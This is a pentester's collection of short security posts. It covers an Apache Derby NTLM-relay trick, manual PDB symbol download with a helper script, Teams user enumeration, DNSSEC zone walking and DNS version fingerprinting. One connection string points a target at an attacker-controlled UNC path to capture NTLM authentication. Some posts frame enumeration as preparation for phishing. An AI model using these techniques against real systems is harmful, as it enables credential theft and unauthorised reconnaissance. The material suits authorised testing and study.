Infosec enthusiast, Pentester, Network Security, PCAP or didn't happen, Monkey Island addict. bka-sec.bsky.social, @_bka_ on birdland
Blog: https://blog.kanbach.org
Birdland: https://twitter.com/_bka_
Bluesky: bka-sec.bsky.social

If you ever find an Apache Derby service running on a Windows machine, try to connect to it by specifying a UNC path as database name and include your address for NTLM relaying.

Example connection string:

jdbc:derby://<target>:1527/\\attacker\foobar;create=false

Downloading symbols for .exe files is easy with tools like symchk, Windbg, IDA or Ghidra. But how to do it manually, for example on Linux with only a few tools available?

First we need the UUID of the PDB and its age. We could use objdump for this (screenshot).

The info we are getting from running this command (if .exe was compiled with symbols) is all we need to construct the URL: Name of the PDB (in this example ipconfig.pdb), UUID and age:

wget https://msdl.microsoft.com/download/symbols/ipconfig.pdb/493b7871de08f6daa56f515cbf6c68b51/ipconfig.pdb

Please note that the last digit, 2, behind the UUID corresponds to the age value. That's it, the symbols are going to be downloaded.

#reverseengineering
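The same steps in code, as an added example that is not part of the original post: it parses the CodeView "RSDS" record (signature, 16-byte GUID, 32-bit age, NUL-terminated PDB path) that objdump prints, and builds the symbol server URL from it. The sample record below is constructed from the GUID, age and PDB name shown in the post; the scanning helper is a quick alternative to walking the PE debug directory.

```python
import struct
import sys

SYMBOL_SERVER = "https://msdl.microsoft.com/download/symbols"


def parse_rsds(record: bytes):
    """Parse a CodeView RSDS record into (pdb_name, guid_hex, age).

    Layout: b"RSDS" | GUID (Data1 u32 LE, Data2 u16 LE, Data3 u16 LE,
    Data4 8 raw bytes) | age u32 LE | PDB path, NUL-terminated.
    """
    if record[:4] != b"RSDS" or len(record) < 25:
        raise ValueError("not an RSDS CodeView record")
    d1, d2, d3 = struct.unpack_from("<IHH", record, 4)
    d4 = record[12:20]  # Data4 is kept in byte order, no swapping
    age = struct.unpack_from("<I", record, 20)[0]
    path = record[24:].split(b"\x00", 1)[0].decode("utf-8", "replace")
    # The compiler stores the full build path; the server key only uses the file name.
    pdb = path.replace("\\", "/").rsplit("/", 1)[-1]
    if not pdb.lower().endswith(".pdb"):
        raise ValueError("RSDS signature found but no PDB path follows")
    guid = f"{d1:08x}{d2:04x}{d3:04x}{d4.hex()}"
    return pdb, guid, age


def symbol_url(pdb: str, guid: str, age: int) -> str:
    """Symbol server path is <pdb>/<GUID hex without dashes><age in hex>/<pdb>."""
    return f"{SYMBOL_SERVER}/{pdb}/{guid}{age:x}/{pdb}"


def find_rsds(data: bytes):
    """Scan raw PE bytes for RSDS records (false hits are rejected by parse_rsds)."""
    found = []
    pos = data.find(b"RSDS")
    while pos != -1:
        try:
            found.append(parse_rsds(data[pos:pos + 24 + 260]))
        except ValueError:
            pass
        pos = data.find(b"RSDS", pos + 4)
    return found


# Constructed sample: the ipconfig.pdb record from the post (GUID 493b7871-..., age 1).
SAMPLE_RSDS = (b"RSDS" + struct.pack("<IHH", 0x493B7871, 0xDE08, 0xF6DA)
               + bytes.fromhex("a56f515cbf6c68b5") + struct.pack("<I", 1)
               + b"D:\\build\\ipconfig.pdb\x00")
SAMPLE_PE = b"MZ" + b"\x00" * 40 + SAMPLE_RSDS + b"\x00" * 8

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PE
    for pdb, guid, age in find_rsds(blob):
        print(symbol_url(pdb, guid, age))
```

Run it against a real .exe to get the wget URL directly; the GUID is printed lowercase like the post's URL, which the server accepts.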

Recently I was trying to refresh an MSGraph token to a token for mysignins.microsoft.com, but failed. The original auth code flow uses client_id 19db86c3-b2b9-44cc-b339-36da233a3be2 and scope 0000000c-0000-0000-c000-000000000000%2F.default+openid. Does anyone have ideas or experiences?

I tried it using two methods:

1. Calling the /token endpoint with grant_type refresh_token. It gave me "error":"invalid_grant"

2. I tried initiating a device code flow using the client_id and scope that I found in the original browser-based auth code flow.

Both didn't work

#azure #cloudsecurity #redteam

My new metasploit module to detect the MSMQ RCE CVE-2023-21554, aka QueueJumper, was just published. Thanks to @chompie1337, Fabius Artrel and @aaronportnoy for the excellent write-up covering the vulnerability and the ideas for detecting affected hosts.

https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/msmq/cve_2023_21554_queuejumper.rb

User Enumeration via Microsoft Teams could be useful during Red Team exercises and in preparation for phishing campaigns. This is described in my recent blog post.

The new tool TeamsEnum could be used to find valid users.

https://securesystems.de/blog/a-fresh-look-at-user-enumeration-in-microsoft-teams/

#osint #redteam #teams #recon

A fresh look at user enumeration in Microsoft Teams

User enumeration in Azure Active Directory environments is an important step in attack simulations. This blog post revisits how user enumeration can be performed for Microsoft Teams and introduces a new tool called TeamsEnum.

DNSSEC uses resource records like NSEC or NSEC3, which can be leveraged for easier subdomain enumeration.

My recent blog post describes these mechanisms, countermeasures, tools and specific implementations. #osint #redteam #BugBounty #dns #dnssec

https://www.securesystems.de/blog/subdomain-enumeration-with-DNSSEC/

Subdomain Enumeration with DNSSEC

DNSSEC uses resource records like NSEC or NSEC3, which can be leveraged for subdomain enumeration. Different techniques for zone enumeration and countermeasures like White Lies and Black Lies are described in this blog post.

After his parents decided to append a null-byte to his name, John\x00

Some nameserver implementations could be fingerprinted by querying the server for RR TXT, Class CH (CHAOS) and name "version.bind". Could be done easily using dig:

dig @<nameserver> -t txt -c CH version.bind

#bugbounty #pentest #pentesting